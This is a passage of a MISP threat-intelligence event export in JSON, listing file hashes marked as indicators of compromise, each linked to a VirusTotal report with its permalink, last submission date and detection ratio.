"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "16887f29-8d0c-46bd-a5ba-43b819d1b5f3" ,
"value" : "2019-04-06T09:09:47"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "08a55fac-9627-496d-b5f1-d2fff1469956" ,
"value" : "https://www.virustotal.com/file/32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3/analysis/1554541787/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "1ad4c142-b928-4b40-954b-ed89873761fa" ,
"value" : "35/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "45275180-143d-4606-9cd3-6bc35646d412" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "45275180-143d-4606-9cd3-6bc35646d412" ,
"referenced_uuid" : "5a3041a4-6ba6-4ce5-8d08-59693a3c3703" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-d8e8-40a7-95c0-4f6b02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "9a33a2c4-25a7-4482-b5a5-00072f8e46e4" ,
"value" : "5a56f0b53d7639c3775b41de95b4902e"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "6b191b84-dc39-4537-b012-8b6dce7695ad" ,
"value" : "18f0a1a2f448d2a5824566a080b32f5d5f291075"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "582b2349-c7ce-45f4-afcb-595f2fe6bd14" ,
"value" : "34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "5a3041a4-6ba6-4ce5-8d08-59693a3c3703" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "28219f45-de8f-443f-95ea-f953b32ab42c" ,
"value" : "2019-04-14T04:38:58"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "9e8d82d4-4886-40e5-b15c-c1f75bb6e0ad" ,
"value" : "https://www.virustotal.com/file/34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe/analysis/1555216738/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "eb4ad240-1687-479f-9ae9-55f16edf0601" ,
"value" : "36/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "56c96c2d-6b60-480a-a6dd-392718a6b188" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "56c96c2d-6b60-480a-a6dd-392718a6b188" ,
"referenced_uuid" : "b5470b5b-e9e6-4ed2-b7c3-108f1e42b227" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-6564-4e23-ba8a-4c0b02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "79ac497f-101f-4fd9-ace8-a2652857be3e" ,
"value" : "3a3f7b2c2bea6a70ad62657b8613b1d1"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "2191451a-62f1-42dc-831e-0df40000465d" ,
"value" : "ca94cde61c2b1640a420c61d2cb9c892b81a30d1"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "e9aca1fc-4843-4c31-90d6-34b75852895f" ,
"value" : "976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "b5470b5b-e9e6-4ed2-b7c3-108f1e42b227" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "605f81fb-6364-412b-a106-39603b9c4e59" ,
"value" : "2019-04-07T17:10:08"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "5990199c-faff-4903-808a-bdbba9f7276a" ,
"value" : "https://www.virustotal.com/file/976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c/analysis/1554657008/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "f678d42e-bf7a-46c0-af36-7e8b82a6f280" ,
"value" : "36/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "548d726e-92df-4311-b2d7-ea098d9a2570" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "548d726e-92df-4311-b2d7-ea098d9a2570" ,
"referenced_uuid" : "d2a962b8-e9f1-4db3-a4ab-cc399560f5cd" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-2b4c-4582-af93-4b1002de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "dced0977-9785-4cfd-8995-243b3df48320" ,
"value" : "fad9b9a909688f800606c2148b4d0880"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "f42ee720-2c78-46a7-9c94-94ccddc0810e" ,
"value" : "ee44b722df537d53a3e59db178e2be57d7f8e985"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "85f40f04-bfc0-404b-8acb-d37974a6b0a4" ,
"value" : "62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355094" ,
"uuid" : "d2a962b8-e9f1-4db3-a4ab-cc399560f5cd" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "a8e523dd-5dd6-466e-86ce-5b009edd7294" ,
"value" : "2018-12-23T16:55:04"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "ce52ccac-75fd-4d28-8300-23b0f0c2682d" ,
"value" : "https://www.virustotal.com/file/62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d/analysis/1545584104/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "dfb31056-0eac-493e-a0cd-66b3ed501c0c" ,
"value" : "26/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355094" ,
"uuid" : "06546ec0-783e-40a7-a681-d2d25f245cf8" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "06546ec0-783e-40a7-a681-d2d25f245cf8" ,
"referenced_uuid" : "5473bd03-6e2e-435d-b979-cca55055af85" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-e6a8-4b52-a9c3-434f02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "2a08c724-0a62-43b6-a0c8-e683cd72e372" ,
"value" : "f0cccfa07427442b472a15232765a2eb"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "fad14535-f8fb-4ff8-bceb-c550a1186f85" ,
"value" : "6cb397aab13cdcbf0c77aea28431d81b036648ad"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "275c6417-75b4-476b-8fa7-b0fa6e6a555b" ,
"value" : "31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355094" ,
"uuid" : "5473bd03-6e2e-435d-b979-cca55055af85" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "e04d799d-8aaf-4a26-88a6-8836e6095eae" ,
"value" : "2019-04-07T05:08:51"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "d9a1cabf-9dfb-4064-a87b-36e6bf32137f" ,
"value" : "https://www.virustotal.com/file/31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756/analysis/1554613731/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "41d13690-0b80-401c-bff5-a3a4142fced8" ,
"value" : "34/56"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355094" ,
"uuid" : "2f932e33-d889-4470-9aca-8ffd5769e055" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "2f932e33-d889-4470-9aca-8ffd5769e055" ,
"referenced_uuid" : "66a53076-8934-43d7-b983-ab73ddd29d99" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-24e0-4f30-afd3-48be02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "0cd432b8-7fe1-49b8-9898-03722b94b8de" ,
"value" : "dccb186234326d4bff449d4416ff6ce4"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "581bbd4b-b27a-436a-a84a-6f147701df1e" ,
"value" : "a787e2e2f2bcfef92aa5032a67f3e6efcd706cb2"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "3fa54938-bbaf-4732-9e41-f1d49559710c" ,
"value" : "f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355095" ,
"uuid" : "66a53076-8934-43d7-b983-ab73ddd29d99" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "9075c263-e538-4257-af4a-94d66a3923da" ,
"value" : "2019-04-07T05:08:46"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "f433ead2-68ba-47c2-a043-af1ae435ca12" ,
"value" : "https://www.virustotal.com/file/f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221/analysis/1554613726/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "ef17cbe3-8b76-4c29-9210-248ede7d0e42" ,
"value" : "36/55"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355095" ,
"uuid" : "952c0e2d-e595-4f12-a5d4-25ec983c91b6" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "952c0e2d-e595-4f12-a5d4-25ec983c91b6" ,
"referenced_uuid" : "d4872fd8-7dc8-47d3-85e7-6e5aebe63db6" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-1688-4aa0-9e8e-428c02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "7b1f1da1-ffe6-4d49-9957-f84457cac77f" ,
"value" : "b94b6857ed382b66cdfbead83480ee15"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "fd6d3582-48e3-4191-8643-b72fd52eab74" ,
"value" : "b22e1b7bf6de3fb7572b26c10300309b04efb1b8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "6e7ff56c-517b-40b3-9c27-bf128f5b63e3" ,
"value" : "fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355095" ,
"uuid" : "d4872fd8-7dc8-47d3-85e7-6e5aebe63db6" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "99e029db-2803-42d1-97b7-cdd070ac880b" ,
"value" : "2019-04-14T08:40:00"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "82dfb261-8353-453a-8fc5-3ec3f9129822" ,
"value" : "https://www.virustotal.com/file/fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5/analysis/1555231200/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "9b8befa3-84b0-4042-8ddd-86b454ceae2a" ,
"value" : "36/59"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355095" ,
"uuid" : "1823da6d-442b-46cf-806d-aac97de195a4" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "1823da6d-442b-46cf-806d-aac97de195a4" ,
"referenced_uuid" : "b5d7ba31-66eb-4bc9-a2c8-5140d36761b8" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-a3cc-4b0f-a3ef-4c1302de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "28708c12-f4c7-4de5-b038-e274224d52da" ,
"value" : "b83113015a0f817c4d68659d9a1e370a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "5a5c76ee-7d95-452f-a5b2-2ff5dbdd673e" ,
"value" : "ec9c669f2b8c13e94a7ba7c57ccf163c8b8cf060"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "70737086-ac37-4fea-a227-f5ce2ff25e22" ,
"value" : "3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355095" ,
"uuid" : "b5d7ba31-66eb-4bc9-a2c8-5140d36761b8" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "211d0bff-f499-4d9f-9b51-f35b3784bc4b" ,
"value" : "2019-03-15T21:23:14"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "bd823c0f-8191-4313-a833-5193229cf518" ,
"value" : "https://www.virustotal.com/file/3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f/analysis/1552684994/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "92028634-4567-407b-9470-2c3b3295062c" ,
"value" : "6/55"
}
]
}
]
}
}